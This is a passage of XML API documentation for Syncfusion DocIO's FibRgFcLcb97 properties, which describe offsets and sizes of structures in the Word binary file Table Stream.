        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfGlsy">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfGlsy at offset fcPlcfGlsy in
            the Table Stream. If base.fGlsy of the Fib that contains this FibRgFcLcb97 is zero, this value MUST be zero.
             </summary>
             <value>
             The LCB PLCF glsy.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfHdd">
             <summary>
             Gets or sets An unsigned integer that specifies the offset in the Table Stream where a Plcfhdd begins. The
            Plcfhdd specifies the locations of each block of header/footer text in the WordDocument Stream. 
             </summary>
             <value>
             The fc PLCF HDD.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfHdd">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the Plcfhdd at offset fcPlcfHdd in
            the Table Stream. If there is no Plcfhdd, this value MUST be zero. A Plcfhdd MUST exist if FibRgLw97.ccpHdd
            indicates that there are characters in the Header Document
             </summary>
             <value>
             The LCB PLCF HDD.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfBteChpx">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcBteChpx begins at the
            offset. fcPlcfBteChpx MUST be greater than zero, and MUST be a valid offset in the Table Stream.
             </summary>
             <value>
             The fc PLCF bte CHPX.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfBteChpx">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcBteChpx at offset
            fcPlcfBteChpx in the Table Stream. lcbPlcfBteChpx MUST be greater than zero.
             </summary>
             <value>
             The LCB PLCF bte CHPX.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfBtePapx">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcBtePapx begins at the
            offset. fcPlcfBtePapx MUST be greater than zero, and MUST be a valid offset in the Table Stream.
             </summary>
             <value>
             The fc PLCF bte papx.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfBtePapx">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcBtePapx at offset
            fcPlcfBtePapx in the Table Stream. lcbPlcfBteChpx MUST be greater than zero.
             </summary>
             <value>
             The LCB PLCF bte papx.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfSea">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc PLCF sea.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfSea">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF sea.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfFfn">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfFfn begins at this
            offset. This table specifies the fonts that are used in the document. If lcbSttbfFfn is 0, fcSttbfFfn is
            undefined and MUST be ignored.
             </summary>
             <value>
             The fc STTBF FFN.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfFfn">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfFfn at offset fcSttbfFfn in
            the Table Stream.
             </summary>
             <value>
             The LCB STTBF FFN.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfFldMom">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcFld begins at this
            offset and specifies the locations of field characters in the Main Document. All CPs in this PlcFld MUST be
            greater than or equal to 0 and less than or equal to FibRgLw97.ccpText. If lcbPlcfFldMom is zero,
            fcPlcfFldMom is undefined and MUST be ignored.
             </summary>
             <value>
             The fc PLCF field mom.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfFldMom">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcfFldMom in
            the Table Stream.
            </summary>
            <value>
            The LCB PLCF field mom.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfFldHdr">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcFld begins at this 
            offset and specifies the locations of field characters in the Header Document. All CPs in this PlcFld are 
            relative to the starting position of the Header Document.
             </summary>
             <value>
             The fc PLCF field HDR.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfFldHdr">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcfFldHdr in 
            the Table Stream.
            </summary>
            <value>
            The LCB PLCF field HDR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfFldFtn">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcFld begins at this 
            offset and specifies the locations of field characters in the Footnote Document. All CPs in this PlcFld are 
            relative to the starting position of the Footnote Document.
            </summary>
            <value>
            The fc PLCF field FTN.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfFldFtn">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcfFldFtn in 
            the Table Stream.
            </summary>
            <value>
            The LCB PLCF field FTN.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfFldAtn">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcFld begins at this 
            offset and specifies the locations of field characters in the Comment Document. All CPs in this PlcFld are 
            relative to the starting position of the Comment Document.
            </summary>
            <value>
            The fc PLCF field atn.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfFldAtn">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcfFldAtn in 
            the Table Stream.
            </summary>
            <value>
            The LCB PLCF field atn.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfFldMcr">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc PLCF field MCR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfFldMcr">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF field MCR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfBkmk">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfBkmk that contains 
            the names of the bookmarks (1) in the document begins at this offset. 
            </summary>
            <value>
            The fc STTBF BKMK.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfBkmk">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfBkmk at offset fcSttbfBkmk.
            </summary>
            <value>
            The LCB STTBF BKMK.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfBkf">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfBkf that contains 
            information about the standard bookmarks (1) in the document begins at this offset. If lcbPlcfBkf is zero, 
            fcPlcfBkf is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKF.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfBkf">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfBkf at offset fcPlcfBkf.
            </summary>
            <value>
            The LCB PLCF BKF.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfBkl">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfBkl that contains 
            information about the standard bookmarks (1) in the document begins at this offset.
            </summary>
            <value>
            The fc PLCF BKL.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfBkl">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfBkl at offset fcPlcfBkl.
            </summary>
            <value>
            The LCB PLCF BKL.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcCmds">
            <summary>
            Gets or sets An unsigned integer that specifies the offset in the Table Stream of a Tcg that specifies 
            command-related customizations. If lcbCmds is zero, fcCmds is undefined and MUST be ignored.
            </summary>
            <value>
            The fc CMDS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbCmds">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Tcg at offset fcCmds.
            </summary>
            <value>
            The LCB CMDS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcUnused1">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc unused1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbUnused1">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfMcr">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc STTBF MCR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfMcr">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB STTBF MCR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPrDrvr">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. The PrDrvr, which contains 
            printer driver information (the names of drivers, port, and so on), begins at this offset.
            </summary>
            <value>
            The fc pr DRVR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPrDrvr">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PrDrvr at offset fcPrDrvr.
            </summary>
            <value>
            The LCB pr DRVR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPrEnvPort">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. The PrEnvPort that is the 
            print environment in portrait mode begins at this offset. If lcbPrEnvPort is zero, fcPrEnvPort is undefined 
            and MUST be ignored.
            </summary>
            <value>
            The fc pr env port.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPrEnvPort">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PrEnvPort at offset fcPrEnvPort.
            </summary>
            <value>
            The LCB pr env port.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPrEnvLand">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. The PrEnvLand that is the 
            print environment in landscape mode begins at this offset. If lcbPrEnvLand is zero, fcPrEnvLand is undefined
            and MUST be ignored.
            </summary>
            <value>
            The fc pr env land.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPrEnvLand">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PrEnvLand at offset fcPrEnvLand.
            </summary>
            <value>
            The LCB pr env land.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcWss">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A Selsf begins at this offset
            and specifies the last selection that was made in the Main Document. If lcbWss is zero, fcWss is undefined 
            and MUST be ignored.
            </summary>
            <value>
            The fc WSS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbWss">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Selsf at offset fcWss.
            </summary>
            <value>
            The LCB WSS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcDop">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A Dop begins at this offset.
            </summary>
            <value>
            The fc dop.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbDop">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Dopat fcDop. This value MUST NOT 
            be zero.
            </summary>
            <value>
            The LCB dop.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfAssoc">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfAssoc that contains 
            strings that are associated with the document begins at this offset.
            </summary>
            <value>
            The fc STTBF assoc.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfAssoc">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfAssoc at offset fc
            SttbfAssoc. This value MUST NOT be zero.
            </summary>
            <value>
            The LCB STTBF assoc.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcClx">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A Clx begins at this offset.
            </summary>
            <value>
            The fc CLX.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbClx">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Clx at offset fcClx in the Table 
            Stream. This value MUST be greater than zero.
            </summary>
            <value>
            The LCB CLX.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfPgdFtn">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc PLCF PGD FTN.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfPgdFtn">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF PGD FTN.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcAutosaveSource">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc autosave source.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbAutosaveSource">
            <summary>
            Gets or sets This value MUST be zero and MUST be ignored.
            </summary>
            <value>
            The LCB autosave source.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcGrpXstAtnOwners">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An array of XSTs begins at 
            this offset. The value of cch for all XSTs in this array MUST be less than 56. The number of entries in this
            array is limited to 0x7FFF. 
            </summary>
            <value>
            The fc GRP XST atn owners.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbGrpXstAtnOwners">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the XST array at offset 
            fcGrpXstAtnOwners in the Table Stream.
            </summary>
            <value>
            The LCB GRP XST atn owners.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfAtnBkmk">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfAtnBkmk that contains
            information about the annotation bookmarks in the document begins at this offset. 
            </summary>
            <value>
            The fc STTBF atn BKMK.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfAtnBkmk">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfAtnBkmk at offset 
            fcSttbfAtnBkmk.
            </summary>
            <value>
            The LCB STTBF atn BKMK.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcUnused2">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc unused2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbUnused2">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcUnused3">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc unused3.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbUnused3">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused3.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcSpaMom">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfSpa begins at this 
            offset. The PlcfSpa contains shape information for the Main Document. 
            </summary>
            <value>
            The fc PLC spa mom.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcSpaMom">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfSpa at offset fcPlcSpaMom.
            </summary>
            <value>
            The LCB PLC spa mom.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcSpaHdr">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfSpa begins at this 
            offset. The PlcfSpa contains shape information for the Header Document. 
            </summary>
            <value>
            The fc PLC spa HDR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcSpaHdr">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfSpa at the offset 
            fcPlcSpaHdr.
            </summary>
            <value>
            The LCB PLC spa HDR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfAtnBkf">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfBkf that contains 
            information about annotation bookmarks in the document begins at this offset. If lcbPlcfAtnBkf is zero, 
            fcPlcfAtnBkf is undefined and MUST be ignored.
            </summary>
            <value>
            The LCB PLC spa HDR.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfAtnBkf">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfBkf at offset fcPlcfAtnBkf.
            </summary>
            <value>
            The LCB PLCF atn BKF.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfAtnBkl">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfBkl that contains 
            information about annotation bookmarks in the document begins at this offset. If lcbPlcfAtnBkl is zero, then
            fcPlcfAtnBkl is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF atn BKL.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfAtnBkl">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfBkl at offset fcPlcfAtnBkl.
            </summary>
            <value>
            The LCB PLCF atn BKL.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPms">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A Pms, which contains the 
            current state of a print merge operation, begins at this offset. If lcbPms is zero, fcPms is undefined and 
            MUST be ignored.
            </summary>
            <value>
            The fc PMS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPms">
            <summary>
            Gets or sets An unsigned integer which specifies the size, in bytes, of the Pms at offset fcPms.
            </summary>
            <value>
            The LCB PMS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcFormFldSttbs">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc form field STTBS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbFormFldSttbs">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB form field STTBS.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfendRef">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfendRef that begins at 
            this offset specifies the locations of endnote references in the Main Document and whether those references 
            use auto-numbering or custom symbols. 
            </summary>
            <value>
            The fc plcfend reference.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfendRef">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfendRef that begins at offset 
            fcPlcfendRef in the Table Stream.
            </summary>
            <value>
            The LCB plcfend reference.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfendTxt">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfendTxt begins at this 
            offset and specifies the locations of each block of endnote text in the Endnote Document. If lcbPlcfendTxt 
            is zero, fcPlcfendTxt is undefined and MUST be ignored.
            </summary>
            <value>
            The fc plcfend text.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfendTxt">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfendTxt that begins at offset 
            fcPlcfendTxt in the Table Stream.
            </summary>
            <value>
            The LCB plcfend text.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfFldEdn">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcFld begins at this 
            offset and specifies the locations of field characters in the Endnote Document. 
            </summary>
            <value>
            The fc PLCF field edn.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfFldEdn">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcfFldEdn in 
            the Table Stream.
            </summary>
            <value>
            The LCB PLCF field edn.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcUnused4">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc unused4.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbUnused4">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused4.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcDggInfo">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An OfficeArtContent that 
            contains information about the drawings in the document begins at this offset.
            </summary>
            <value>
            The fc DGG information.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbDggInfo">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the OfficeArtContent at the offset 
            fcDggInfo. If lcbDggInfo is zero, there MUST NOT be any drawings in the document.
            </summary>
            <value>
            The LCB DGG information.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfRMark">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfRMark that contains 
            the names of authors who have added revision marks or comments to the document begins at this offset. 
            </summary>
            <value>
            The fc STTBF r mark.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfRMark">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfRMark at the offset 
            fcSttbfRMark.
            </summary>
            <value>
            The LCB STTBF r mark.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfCaption">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. An SttbfCaption that contains
            information about the captions that are defined in this document begins at this offset. 
            </summary>
            <value>
            The fc STTBF caption.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfCaption">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfCaption at offset 
            fcSttbfCaption in the Table Stream. If base.fDot of the Fib that contains this FibRgFcLcb97 is zero, this 
            value MUST be zero.
            </summary>
            <value>
            The LCB STTBF caption.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfAutoCaption">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A SttbfAutoCaption that 
            contains information about the AutoCaption strings defined in this document begins at this offset.
            </summary>
            <value>
            The fc STTBF automatic caption.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfAutoCaption">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfAutoCaption at offset 
            fcSttbfAutoCaption in the Table Stream. If base.fDot of the Fib that contains this FibRgFcLcb97 is zero, 
            this MUST be zero.
            </summary>
            <value>
            The LCB STTBF automatic caption.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfWkb">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfWKB that contains 
            information about all master documents and subdocuments begins at this offset.
            </summary>
            <value>
            The fc PLCF WKB.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfWkb">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfWKB at offset fcPlcfWkb in 
            the Table Stream. If lcbPlcfWkb is zero, fcPlcfWkb is undefined and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF WKB.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfSpl">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A Plcfspl, which specifies 
            the state of the spell checker for each text range, begins at this offset. If lcbPlcfSpl is zero, then 
            fcPlcfSpl is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF SPL.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfSpl">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the Plcfspl that begins at offset 
            fcPlcfSpl in the Table Stream.
            </summary>
            <value>
            The LCB PLCF SPL.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcftxbxTxt">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcftxbxTxt begins at this 
            offset and specifies which ranges of text are contained in which textboxes. If lcbPlcftxbxTxt is zero, 
            fcPlcftxbxTxt is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCFTXBX text.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcftxbxTxt">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcftxbxTxt that begins at offset
            fcPlcftxbxTxt in the Table Stream.
            </summary>
            <value>
            The LCB PLCFTXBX text.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfFldTxbx">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcFld begins at this 
            offset and specifies the locations of field characters in the Textbox Document. All CPs in this PlcFld are 
            relative to the starting position of the Textbox Document.
            </summary>
            <value>
            The fc PLCF field TXBX.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfFldTxbx">
            <summary>
            Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcFld at offset fcPlcfFldTxbx in
            the Table Stream.
            </summary>
            <value>
            The LCB PLCF field TXBX.
            </value>
        </member>
